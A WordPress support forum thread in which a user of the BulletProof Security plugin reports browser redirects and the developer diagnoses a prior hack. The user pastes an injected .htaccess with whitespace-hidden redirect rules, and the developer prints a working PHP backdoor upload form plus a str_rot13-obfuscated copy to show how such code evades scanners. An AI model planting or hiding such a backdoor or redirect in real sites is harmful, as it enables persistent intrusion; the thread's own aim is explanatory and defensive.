[Plugin: BulletProof Security] redirected to browser homepage

I need more details about what the issue is.

What exactly do you mean by your statement below? Please explain with specific examples.

…no matter what address I typed in the browser, any browser, I just saw in a flash the address desired and inmediately after I was redirected to my browser homepage (google seaarch)….

What type of Hosting do you have? Linux or Windows or some other type of hosting?

Hi, thanks for the prompt reply,

What happened was that i was locked out of the site: whenever I tried to access a page, or the front page, form a bookmark, say, I could see for an instant the requested address but then it desappeared and I landed on my broser home page (google.com), and that regardless of the browser or machine I was using.

I solved the problem uninstalling everything (this is a new project I am working on) and reinstalled WordPress and all the plugins but BulletProof security. Now it works. Pity though…

Oh ok this sounds like the Broken cPanel HotLink Protection Tool problem. Please see this thread >>> https://www.ads-software.com/support/topic/plugin-bulletproof-security-broken-cpanel-hotlink-tool-404-errors-unable-to-edit-htaccess-files?replies=6

Did you check for the broken cpanel hotlink protection tool problem? is this problem resolved? or did you decide to just not install BPS? Please resolve this thread if the problem is resolved. Thanks.

Sorry, not yet as I was travelling. I’ll have a look later in the evening.

Anyway, I had a quick look at the link, but my .htaccess now looks like this, and I say now because a few days agoe all mu .htaccess had a lot of redirections, and no matter which permissions I set to the file they are changed in few minutes to 644 and all the non wordpress stuff reappears. This happenede after my provider (HostMonster) notified me that there had been an injection of some sort and that they had automatically corrected the file and would continue to do so ??
It is difficult to read because I have left the original formatting, in case tha is of any help.

<IfModule mod_rewrite.c>
																														RewriteEngine On
																														RewriteCond %{HTTP_REFERER} ^.*(ladyluck)\.(.*)
																														RewriteRule ^(.*)$ https://ya.ru [R=301,L]
																														</IfModule>																														

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

																														ErrorDocument 500 https://ya.ru

and some 50 empty lines after the last one

ah ok now i see what the problem is. Your website was already hacked before you installed BPS.

BPS does not automatically clean up a hacked website. You can try using a scanning plugin to find and clean the site, but scanning plugins are only capable of finding some and not all of the hackers files. They will not detect hacker’s backdoor scripts.

So the best thing to do would be to restore your website from a good backup or backup your entire website and database and then delete your entire site and database and install everything brand new and then import ONLY your database content tables.

A hacker’s very simple backdoor uploader – just a simple upload form. A scanning plugin will not find this code and the hacker will just upload his/her files again to your website.

if (isset($_POST['booger'])) {
$tmp_file = $_FILES['blah']['tmp_name'];
$folder_path = $_SERVER['DOCUMENT_ROOT'].'/';
$uploaded_file = $_FILES['blah']['name'];
	if (!empty($_FILES)) {
	move_uploaded_file($tmp_file, $uploaded_file);
	}
}

<form name="Scanners_Dont_See_Me" action="" method="post" enctype="multipart/form-data">
<input name="blah" type="file" />
<input type="submit" name="booger" class="button" value="Kitty Cat" />
</form>

And for the scanners that look for forms and form processing coding they are easily beaten by using the str_rot13 php function or many other methods to hide the form and form processing coding.

This is the exact same form processing code as shown above, but it is hidden using str_rot13

str_rot13('vs (vffrg($_CBFG['."'".obbtre."'".'])) {
$gzc_svyr = $_SVYRF['."'".oynu."'".']['."'".gzc_anzr."'".'];
$sbyqre_cngu = $_FREIRE['."'".QBPHZRAG_EBBG."'".']'."."."'"."/'".';
$hcybnqrq_svyr = $_SVYRF['."'".oynu."'".']['."'".anzr."'".'];
	vs (!rzcgl($_SVYRF)) {
	zbir_hcybnqrq_svyr($gzc_svyr, $hcybnqrq_svyr);
	}
}');

Thanks a lot. I will have to do a lot of work to check several sites though… well, your help has been invaluable and after I’ve solved the problems I will reinstall BPS

Yeah i hate to be the one to tell you the bad news. I’m sorry that your site was hacked. it sucks. ;(

And yep you want to lock all of your websites down if they are all under the same Hosting account and restore all of them at the same time. And of course change all of your passwords too. Ugh.